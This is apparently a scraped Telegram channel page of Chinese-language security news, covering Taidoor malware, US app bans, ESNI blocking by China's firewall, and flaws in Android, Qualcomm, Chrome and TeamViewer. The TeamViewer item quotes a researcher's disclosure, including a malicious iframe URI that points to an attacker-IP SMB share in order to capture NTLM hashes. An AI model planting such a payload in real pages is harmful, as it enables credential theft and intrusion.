信息安全技术频道🔎
11.9K subscribers
1.78K photos
531 videos
366 files
4.54K links
Download Telegram
信息安全技术频道🔎
你最喜欢用的翻墙代理是?
===== 评论区 =====
ㅤ 樱雪紫琪: 来源网络的l2tp协议等其他公益vpn
This media is not supported in your browser
VIEW IN TELEGRAM
中共用恶意软件Taidoor发动网络攻击

美国国土安全部、联邦调查局和国防部,周一发出警告,中共利用一种活跃了10多年的恶意软件,发动网络攻击。
国土安全部下属的“网络安全和基础设施安全局”、联邦调查局,以及国防部发布联合报告,中国政府使用了一种名叫“泰门”的恶意软件变种。最新发现的是“泰门”X86和X64版本。
“泰门”作为服务动态链接库,被安装在攻击目标系统上。它通常包含两个文件,第一个文件是下载器,负责解压第二个文件,并在内存中运行恶意软件。
“网络安全和基础设施安全局”周一发推文表示,中国从2008年开始,就利用“泰门”破坏网络系统。
联邦调查局周一也推文说:“联邦调查局怀疑中共政府网络使用者,利用“泰门”寄存在受害者的网络上。”
联邦调查局确信,中共政府将恶意软件变种,与代理服务器相结合,安装在受害者系统上,进行进一步网络操作。
“网络安全和基础设施安全局”表示,今年5月13日,该安全局和联邦调查局联合发布报告,警告研究新冠病毒的机构,可能遭到来自中方的网络攻击。
报告指出,研究新冠病毒的医疗、制药和研究部门,是中共的首要攻击目标。
报告还说,中共对这些部门的攻击,给美国应对疫情带来巨大威胁。

#中共 #美国 #恶意软件 #网络攻击 #新冠肺炎

信息安全技术频道🔎
@tg_InternetSecurity
This media is not supported in your browser
VIEW IN TELEGRAM
美国推出干净网络全面对抗中共

周二,美国国务卿蓬佩奥宣布实施专门针对中共制订的“干净网络”政策,目的是彻底终结中共利用通讯和互联网行业对美国的侵害。
今年4月,蓬佩奥宣布了美国的“干净路径”政策,禁止使用任何由华为、中兴等受中共控制的电信公司所提供设备和服务。
而国务院周三宣布的政策是对“干净路径”政策的重大升级和扩展,增加了“干净运营商”、“干净软件”、“干净应用商店”、“干净云端”和“干净电缆”5大领域。
根据新政策,美国将拒绝中共电信运营商,在未来为美国与其它国家间的国际电信提供服务,同时责成联邦电信委员会(FCC),终止中国电信等3家中共企业正在美国提供的电信服务。
美国的应用软件商店也将清理所有不被信任的中国应用程序。
同时,美国政府还将禁止华为等中国供应商,预装或提供下载美国应用程序,避免美国企业成为华为和中共侵犯人权的帮凶。
此外,川普政府还将限制中国的云服务提供商在美国收集、存储和处理大数据及敏感信息的能力。
而“干净电缆”政策,将确保中共无法从美国和其它国家连入全球互联网的海底电缆中窃取信息。
国务院周三推出“干净网络”政策,是美国近期一系列抵制中共侵略行为的最新措施,旨在彻底断绝中共利用互联网和通讯行业对美国进行侵犯。

#美国 #中共 #信息安全 #干净网络

信息安全技术频道🔎
@tg_InternetSecurity
川普签行政令:45天后禁美企与TikTok、微信交易

美国总统特朗普6日签署2项行政命令,将在45天后禁止美国任何个人或企业与TikTok及其母公司字节跳动、WeChat及其母公司腾讯进行交易。川普表示,此举是为了保护美国人的隐私和国家安全。目前,美国国土安全部、运输安全管理局和美国武装部队已经禁止在政府手机上使用TikTok。
川普宣布在命令公布45天后,将禁止所有美国民众及企业和TikTok的中国母公司字节跳动进行任何交易,任何违反这项命令的个人或企业都可能面临制裁。
另一项行政命令是针对微信,同样将在命令公布45天后,禁止所有美国民众及企业与微信的母公司腾讯进行任何交易。川普政府一直警告,微信会自动从用户那里获取大量信息,被中共政府使用。
美国国务卿蓬佩奥表示,“由于母公司设在中国,Tiktok和微信等应用对美国公民的个人数据构成了重大威胁,更不用说中国共产党的内容审查工具了”。
美国政府正在采取行动把这些中国的应用程式从美国移动应用商店清除出去,以确保美国人的隐私和商业信息不被中共政府盗取。

#美国 #中共 #抖音 #微信

信息安全技术频道🔎
@tg_InternetSecurity
新发现一种通过蓝牙入侵Android手机的方法

据周三在2020年黑帽大会上发表的最新DBAPPSecurity研究显示,想要从Android设备中窃取联系人,通话记录和SMS验证码等敏感信息的攻击者只需针对蓝牙协议即可。
研究人员发现,这些漏洞利用了零日漏洞,其中之一还可以使黑客在操纵不当的情况下发送假短信。
它的工作原理是,允许攻击者伪装成可信任的应用程序,并请求允许一个支持蓝牙的设备与另一个设备(如耳机或汽车的“信息娱乐”系统)共享数据的权限。为了使攻击成功进行,必须在目标设备上启用蓝牙,并且受害者必须批准攻击者的特权请求。最后,这家行动公司使攻击者能够访问受害者设备上的数据。
另一种攻击使研究人员可以利用称为“ BlueRepli”的身份验证绕过漏洞。潜在的攻击者可以通过模仿以前与目标连接的设备来绕过身份验证。受害者无需授予设备权限即可利用该漏洞利用程序。
谷歌发言人:“我们已经意识到了这个问题,目前正在与我们的合作伙伴一起开发解决方案。”
研究人员称,该漏洞不会影响iPhone。
蓝牙长期以来一直受漏洞困扰,其中包括那些可能使附近的黑客在受害设备上执行代码的漏洞。
美国国家安全局本周早些时候警告说,即使避免关闭GPS或位置服务,想要避免从手机中暴露敏感位置数据的用户也应注意,移动设备会使用WiFi或蓝牙来计算位置。

#黑客 #Android #个人隐私 #入侵 #蓝牙

信息安全技术频道🔎
@tg_InternetSecurity
TeamViewer漏洞可能被利用来破解用户密码

Windows的TeamViewer中的高风险漏洞(CVE-2020-13699)可能被远程攻击者利用来破解用户的密码,从而导致进一步的系统利用。
TeamViewer是由德国公司TeamViewer GmbH开发的应用程序,它主要用于远程访问和控制各种类型的计算机系统和移动设备,还提供协作和演示功能。
CVE-2020-13699是安全漏洞,由未引用搜索路径或元素引起–更具体地说,这是由于应用程序未正确引用其自定义URI处理程序而引起的-当安装了TeamViewer漏洞版本的系统访问恶意制作的网站。
“攻击者可以使用精心制作的URL(iframe src ='teamviewer10:--play \\ attacker-IP \ share \ fake.tvs')将恶意iframe嵌入网站中,这将启动TeamViewer Windows桌面客户端并强制其执行以下操作:打开远程SMB共享。” Praetorian的安全工程师Jeffrey Hofmann解释说,他发现并负责地披露了该漏洞。
“ Windows在打开SMB共享时将执行NTLM身份验证,并且可以(使用诸如响应程序之类的工具)中继该请求以执行代码(或捕获该请求以进行哈希破解)。”
据该公司称,该漏洞影响Windows平台的TeamViewer版本8至15(最高15.8.2)。建议用户升级到15.8.3版以消除漏洞。

#漏洞 #Windows #信息安全 #TeamViewer

信息安全技术频道🔎
@tg_InternetSecurity
几个添加telegram群组的导航网站

1. Combot:https://combot.org/telegram/top/chats
2. tele.mehttps://tele.me/
3. 中文圈群组索引:https://www.telegram.url.tw/
4. Telegram 群組/頻道/機器人 公眾索引系統:https://tg.weils.net/
5. telegramindex:https://telegramindex.com/
6. 导航机器人频道:https://t.me/TG_index_channel
7. 导航机器人:https://t.me/hao1234bot

#telegram

信息安全技术频道🔎
@tg_InternetSecurity
中国防火墙开始屏蔽 ESNI

Geneva、GFW Report、iYouPort团队发现中国的防火长城(GFW)已经开始封锁ESNI(加密服务器名称指示)这一TLS1.3和HTTPS的基础特性。测试发现,防火墙通过丢弃从客户端到服务器的数据包来阻止 ESNI 连接。此外,ESNI 封锁不仅会发生在 443 端口,也会发生在 1 到 65535 的所有端口。在阻断 ESNI 握手后,防火墙会继续阻断与(源IP,目标IP,目标端口) 3 元组相关的任何连接一段时间。
服务器名称指示(英语:Server Name Indication,简称SNI)是一个扩展的TLS计算机联网协议,在该协议下,在握手过程开始时客户端告诉它正在连接的服务器要连接的主机名称。这允许服务器在相同的IP地址和TCP端口号上呈现多个TLS证书,并且因此允许在相同的IP地址上提供多个安全(HTTPS)网站(或其他任何基于TLS的服务),而不需要所有这些站点使用相同的TLS证书。它与HTTP/1.1基于名称的虚拟主机的概念相同,但是用于HTTPS。所需的主机名未加密, 因此窃听者可以查看请求的网站。
由于SNI信息并非加密的,允许审查者区分出“真实”和“虚假”的服务或者识别出用户访问的网站域名。现已被部分国家用于互联网审查。
作为TLS的标准扩展实现,TLS 1.3将通过支持加密SNI以解决这个问题。目前,Cloudflare、Mozilla、Fastly和苹果的开发者已开始制定了关于加密服务器名称指示(Encrypted Server Name Indication)的草案。

#中国 #网络审查 #防火墙 #iYouPort #ESNI

信息安全技术频道🔎
@tg_InternetSecurity
中国黑客对台湾的半导体产业发动入侵

台湾在整个生存过程中都面临着与中国的生存冲突,并且多年来一直是中国政府资助的黑客攻击的目标。但是,一家台湾安全公司的一项调查显示,一群中国黑客能够深入到台湾经济核心的一个产业,实际上是掠夺了整个半导体产业。
来自台湾网络安全公司CyCraft的研究人员展示了黑客活动的细节,该活动在过去两年中至少损害了七家台湾芯片公司的利益。一系列深度入侵的出现旨在窃取尽可能多的知识产权,包括源代码,软件开发套件和芯片设计。
研究人员发现,至少在某些情况下,黑客似乎通过损害虚拟专用网络来获得对受害者网络的初始访问权限,尽管目前尚不清楚他们是否获得了该VPN访问的凭据,或者是否直接利用了VPN服务器中的漏洞。 然后,黑客通常使用渗透测试工具Cobalt Strike的定制版本,通过为其命名与Google Chrome更新文件相同的名称来掩饰他们所植入的恶意软件。他们还使用了托管在Google或Microsoft的云服务上的命令和控制服务器,从而使其通信更难被检测为异常。
Raiu说:“他们所看到的可能只是一幅大图的一小部分。” Raiu补充说,Winnti在与中国有联系的组织中广泛针对台湾地区并不是唯一的。但是他说Winnti的创新策略,例如劫持华硕的软件更新,使它们与众不同。
不过,即使在中国大规模入侵其岛屿邻国的情况下,CyCraft的达菲仍认为,半导体产业是一个特别危险的目标。他指出,窃取芯片原理图可能会允许中国黑客更容易地挖掘隐藏在计算机硬件中的漏洞。
CyCraft承认无法确定黑客对被盗的芯片设计文档和代码的处理方式。黑客活动的动机很可能只是让中国自己的半导体制造商在竞争中脱颖而出。达菲说:“这是削弱台湾经济的一部分,损害其长期生存能力的一种方式。”

#中国 #台湾 #黑客 #入侵

信息安全技术频道🔎
@tg_InternetSecurity
Android手机可能会通过高通芯片中的漏洞监视用户

Check Point Research说,在高通Snapdragon芯片中发现了漏洞,攻击者可以利用这些漏洞在Android手机上获取照片,视频,通话记录和其他数据。
高通公司是移动领域中的通用名称,因为其芯片已嵌入Google,三星,LG,小米,OnePlus和其他Android供应商的手机中。 根据Check Point的说法,iPhone不受这些漏洞的影响。
高通的修复只是第一步。 现在,移动供应商需要介入以向其用户应用并推出必要的补丁程序。 因此,Check Point表示,直到移动供应商部署了解决这些漏洞的全面方法之前,它不会透露有关该漏洞的全部详细信息。 这可能需要一段时间。

#Android #漏洞 #芯片技术

信息安全技术频道🔎
@tg_InternetSecurity
Signal在中国的下载量激增

美国总统川普签发行政令,宣布在全美禁用微信和抖音。美国华人开始担忧事情的严重性,部分华人已经开始转向下载一款美国应用程序Signal。
据悉,微信称在全球有10亿用户,包括在美国的300多万华人。而对于一些留学生及当地华人来说,微信却是他们与国内亲友沟通的重要渠道,微信也因此成为中共政府向海外华人进行宣传的工具。
美国华人已经开始担忧与国内的联系受阻。其中一些人已经开始下载使用WhatsApp、Telegram和Line等其他即时通讯应用,但是这些应用在中国无法使用。
目前,Signal并未受到中共防火墙阻拦。Signal几乎不存储用户信息,消息是端到端加密传输。
由于不共享用户数据政策,Signal发言人Jun Harada拒绝分享实际下载次数,不过他表示,在川普禁令发布前几个小时,中国的下载量开始激增。他说:“与我们在香港应用商店中排名第一的情况相比,看起来可以相提并论。”
他指的是在7月份北京开始在香港实施国安法时,香港用户的下载量激增。Jun Harada说:“我们认为,这有助于我们在中国境内以及在海外华人中获得更多的主流关注。”
除了Signal,Line也是中国海外用户下载急增的通讯软件。根据市场情报公司Sensor Tower的统计,7月13日至19日期间,Line在美国至少安装了11.9万次,比前一周的3.8万次猛增213%。
Line目前在全球拥有2亿用户。Line是由韩国互联网巨头Naver创建,最近与日本雅虎合并,2014年7月在中国大陆被封杀。

#Sigmal #美国 #中国 #WhatsApp #telegram #Line

信息安全技术频道🔎
@tg_InternetSecurity
中共政府隐瞒疫情,导致疫情扩散至全世界

#新冠肺炎 #中共

信息安全技术频道🔎
@tg_InternetSecurity
Google Chrome漏洞使数十亿用户数据遭窃

Google的基于Chromium的浏览器中的漏洞可能使攻击者绕过网站上的内容安全政策(CSP),从而窃取数据并执行恶意代码。
据PerimeterX网络安全研究人员Gal Weizman称,该漏洞(CVE-2020-6519)可在Windows,Mac和Android的Chrome,Opera和Edge中找到——这可能影响数十亿网络用户。 Chrome的73(2019年3月)到83版本(84版本在7月发布并修复了该问题)受到影响。
CSP是一种网络标准,旨在阻止某些类型的攻击,包括跨站点脚本(XSS)和数据注入攻击。 CSP允许Web管理员指定浏览器应视为可执行脚本有效来源的域。然后,与CSP兼容的浏览器将仅执行从这些域接收的源文件中加载的脚本。
研究人员指出,大多数网站都使用CSP,包括ESPN,Facebook,Gmail,Instagram,TikTok,WhatsApp,Wells Fargo和Zoom等互联网巨头。某些著名的网站不受影响,包括GitHub,Google Play商店,LinkedIn,PayPal,Twitter,Yahoo的登录页面和Yandex。
要利用此漏洞,攻击者首先需要(通过暴力破解密码或其他方法)访问Web服务器,以便能够修改其使用的JavaScript代码。然后,攻击者可以在JavaScript中添加frame-src或child-src指令,以允许注入的代码加载并执行它,从而绕过CSP强制执行。
该漏洞已在Chrome浏览器中存在超过一年,但未得到修复,Weizman警告说,“该漏洞的全部影响尚不为人所知,极有可能在未来几个月内,我们将了解利用该漏洞的人是出于什么目的将个人身份信息(PII)泄露出去的。”

#Chrome #漏洞 #个人隐私 #浏览器

信息安全技术频道🔎
@tg_InternetSecurity